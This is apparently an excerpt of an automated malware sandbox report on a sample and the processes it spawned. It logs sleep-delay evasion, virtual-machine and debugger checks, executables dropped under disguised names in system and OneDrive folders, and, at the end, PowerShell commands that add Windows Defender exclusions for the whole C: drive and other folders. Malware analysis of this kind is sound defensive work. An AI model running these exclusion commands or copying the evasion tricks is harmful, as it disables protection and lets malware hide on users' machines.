                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\Default\Documents\sihost.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1437
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1225
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1527
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1131
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1215
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 852
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1012
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1368
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1097
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1483
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1499
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 894
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1313
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1366
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1364
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1393
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 976
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1417
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 899
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\gLKxhGkC.log
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\rzpnRRfk.log
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\IGGSkEKz.log
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\jwqNoTvv.log
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\ppTmQzAj.log
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\izOFSTgA.log
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\AdxdALuR.log
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Evasive API call chain: GetLocalTime,DecisionNodes | graph_0-23682
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exe TID: 7028 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe TID: 4416 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe TID: 8896 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864 | Thread sleep count: 1437 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8960 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8652 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736 | Thread sleep count: 1225 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8928 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844 | Thread sleep count: 1527 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8992 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3264 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780 | Thread sleep count: 1131 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8912 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8632 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784 | Thread sleep count: 1215 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8984 | Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8640 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992 | Thread sleep count: 852 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8948 | Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8580 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132 | Thread sleep count: 1012 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8916 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8616 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044 | Thread sleep count: 1368 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8952 | Thread sleep time: -10145709240540247s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040 | Thread sleep count: 1097 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8968 | Thread sleep time: -9223372036854770s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8672Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep count: 1483 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8956Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8600Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8268Thread sleep count: 1499 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8944Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8720Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8200Thread sleep count: 894 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8936Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8288Thread sleep count: 1313 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8932Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8272Thread sleep count: 1366 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8980Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8756Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8276Thread sleep count: 1364 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8988Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8812Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8340Thread sleep count: 1393 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8840Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8524Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8320Thread sleep count: 976 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8976Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8776Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8328Thread sleep count: 1417 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8940Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8364Thread sleep count: 899 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8860Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8588Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe TID: 9040Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe TID: 9204Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\Default\Documents\sihost.exe TID: 8864Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\Default\Documents\sihost.exe TID: 8520Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe TID: 8540Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\Default\Documents\sihost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\Default\Documents\sihost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_001EA69B
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_001FC220
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FE6A3 VirtualQuery,GetSystemInfo,0_2_001FE6A3
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Default\Documents\sihost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Default\Documents\sihost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeThread delayed: delay time: 922337203685477
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: wscript.exe, 00000001.00000003.1942576110.0000000002CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: ComComponentDriverInto.exe, 00000008.00000002.2284157665.000000001BCE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\b
                        Source: wscript.exe, 00000001.00000003.1942576110.0000000002CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: wscript.exe, 00000001.00000002.1943696350.0000000002D0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&
                        Source: wscript.exe, 00000001.00000002.1943696350.0000000002D0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\netutils.dllCVMWar&Prod_VMware_SATA_CD00#4&224f42ef
                        Source: w32tm.exe, 0000004F.00000002.2132525610.000001EE27560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeAPI call chain: ExitProcess graph end nodegraph_0-23873
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001FF838
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_00207DEE mov eax, dword ptr fs:[00000030h]0_2_00207DEE
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_0020C030 GetProcessHeap,0_2_0020C030
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeProcess token adjusted: Debug
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeProcess token adjusted: Debug
                        Source: C:\Users\Default\Documents\sihost.exeProcess token adjusted: Debug
                        Source: C:\Users\Default\Documents\sihost.exeProcess token adjusted: Debug
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001FF838
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FF9D5 SetUnhandledExceptionFilter,0_2_001FF9D5
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001FFBCA
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_00208EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00208EBD
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
